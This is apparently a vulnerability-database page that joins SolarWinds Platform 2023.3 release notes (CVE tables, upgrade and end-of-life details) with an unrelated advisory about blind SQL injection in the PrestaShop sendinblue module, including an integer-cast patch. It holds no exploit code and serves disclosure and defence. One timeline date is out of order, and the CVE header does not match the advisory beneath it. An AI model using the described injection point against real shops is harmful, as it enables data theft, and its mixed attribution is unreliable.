SolarWinds Platform Access Control Bypass Vulnerability

An Access Control Bypass Vulnerability exists in the SolarWinds Platform that, if exploited, could allow an underprivileged user to read an arbitrary resource.

4.6 Medium

Alex Shepard

**Third-party CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2022-37434

Heap-Based Buffer Over-Read or Buffer Overflow Vulnerability

zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).

Critical

CVE-2012-6708

Cross-Site Scripting Vulnerability

jQuery before 1.9.0 is vulnerable to Cross-site Scripting (XSS) attacks. The jQuery(strInput) function does not differentiate selectors from HTML in a reliable fashion. In vulnerable versions, jQuery determined whether the input was HTML by looking for the '<' character anywhere in the string, giving attackers more flexibility when attempting to construct a malicious payload. In fixed versions, jQuery only deems the input to be HTML if it explicitly starts with the '<' character, limiting exploitability only to attackers who can control the beginning of a string, which is far less common.

Medium

CVE-2020-11022

DOM Manipulation Vulnerability

In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0

Medium

CVE-2020-11023

DOM Manipulation Vulnerability

In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.

Medium

CVE-2015-9251

Cross-Site Scripting Vulnerability

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

Medium

CVE-2019-11358

Unsanitized Input Vulnerability

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable \_\_proto\_\_ property, it could extend the native Object.prototype.

Medium

CVE-2020-7656

Cross-Site Scripting Vulnerability

jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e: "</script >", which results in the enclosed script logic to be executed.

High

Return to top

**Installation or upgrade**

For new installations, you can download the installation file from the product page on https://www.solarwinds.com or from the Customer Portal. For more information, see Get the installer.

For upgrades, including options to pre-stage the installation files, go to Settings > My Deployment to initiate the upgrade. The SolarWinds Installer upgrades your entire deployment (all SolarWinds Platform products and any scalability engines).

For more information, see the SolarWinds Platform Product Installation and Upgrade Guide.

You must be on SolarWinds Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2023.3. If you are on SolarWinds Platform 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.3.

Return to top

**Before you upgrade!**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   The legacy syslog and traps functionality has been retired and replaced with a new functionality called SolarWinds Log Viewer, which can be upgraded to Log Analyzer for additional capabilities. Current rules and history will automatically be migrated to the new logging functionality (SolarWinds Log Viewer or Log Analyzer). The functionality of SolarWinds Log Viewer and Log Analyzer has been improved to more closely match legacy functionality. See LA 2022.3 release notes for details.
    
    If you built syslog and trap alerts using custom SQL queries, they will not function after upgrading to 2022.3 or later. SolarWinds recommends you rewrite the alerts using SWQL (Orion.OLM entities) or using the alerting functionality built into Log Viewer/Log Analyzer.
    
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2020.2 or earlier.

Return to top

**End of life**

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds has announced end-of-life plans. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.

See the End of Life Policy for information about SolarWinds product life cycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

Return to top

**Deprecation notice**

The following platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features.

 

Type

Details

Network Atlas

Network Atlas is deprecated as of Orion Platform 2020.2. It is still available and supported in the current release, but will be removed in a future release. Deprecation is an indication that you should avoid expanded use of this feature and formulate a plan to discontinue using the feature. SolarWinds recommends that you start using SolarWinds Platform Maps in the SolarWinds Platform Web Console to display maps of physical and logical relationships between entities monitored by the SolarWinds Platform products you have installed.

Port 17778

SWIS REST Endpoint on port 17778 is deprecated as of 2023.1 and will be replaced with port 17774 in a future release. SolarWinds recommends that you start migrating SWIS REST Endpoint to port 17774.

Return to top

**Legal notices**

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-33225: SolarWinds Platform 2023.3 Release Notes

SQL injection vulnerability found in PrestaShop sendinblue v.4.0.15 and before allow a remote attacker to gain privileges via the ajaxOrderTracking.php component.

In the module “Sendinblue - All-in-one marketing tool” (sendinblue) up to versions 4.0.14 from Sendinblue for PrestaShop, an anonymous user can perform SQL injection in affected versions if double optin is enabled. 4.0.15 fixed vulnerabilities.

**Summary**

*   **CVE ID**: CVE-2023-26859
*   **Published at**: 2023-07-25
*   **Advisory source**: Friends-of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: sendinblue
*   **Impacted release**: <= 4.0.14 (4.0.15 fixed the vulnerability)
*   **Product author**: Sendinblue
*   **Weakness**: CWE-89
*   **Severity**: high (8.1)

**Description**

In sendinblue module for PrestaShop up to 4.0.14, a sensitive SQL call on ajaxOrderTracking.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught for instance the POST or GET submitted id_shop_group variable if the double optin option is set.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: high
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch**

For PrestaShop 1.6, with sendingblue version 2.8.8, apply this patch:

    --- a/modules/sendinblue/ajaxOrderTracking.php
    +++ b/modules/sendinblue/ajaxOrderTracking.php
    @@ -59,7 +59,7 @@ if ($sendin_order_track_status == 0) {
             $dateFormate = 'm-d-Y';
         }
         $condition = '';
    -    $id_shop_group = !empty($id_shop_group) ? $id_shop_group : 'NULL';
    +    $id_shop_group = !empty($id_shop_group) ? (int) $id_shop_group : 'NULL';
         $id_shop = !empty($id_shop) ? $id_shop : 'NULL';
         
         if ($id_shop === 'NULL' && $id_shop_group === 'NULL') {
    
    

For PrestaShop 1.7, with sendingblue version 4.x, _remove all files ajaxXXX.php_ especially _ajaxOrderTracking.php_.

**Other recommandations**

*   It’s **highly recommended to upgrade the module** to the latest version or to **delete** the module if unused.
*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-12-02

Issue discovered during a code reviews by 202 ecommerce

2022-12-02

Contact the author

2023-12-19

First fixed candidate from the author 4.0.15 for PrestaShop 1.7. PrestShop 1.6 remain vulnerable

2022-12-19

Contact the author to fix others vulnerabilities

2023-01-31

Contact PrestaShop team to claim a fix on all available package downloadable

2023-02-12

Request a CVE ID

2023-07-23

Publication of the CVE

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

Tag

#sql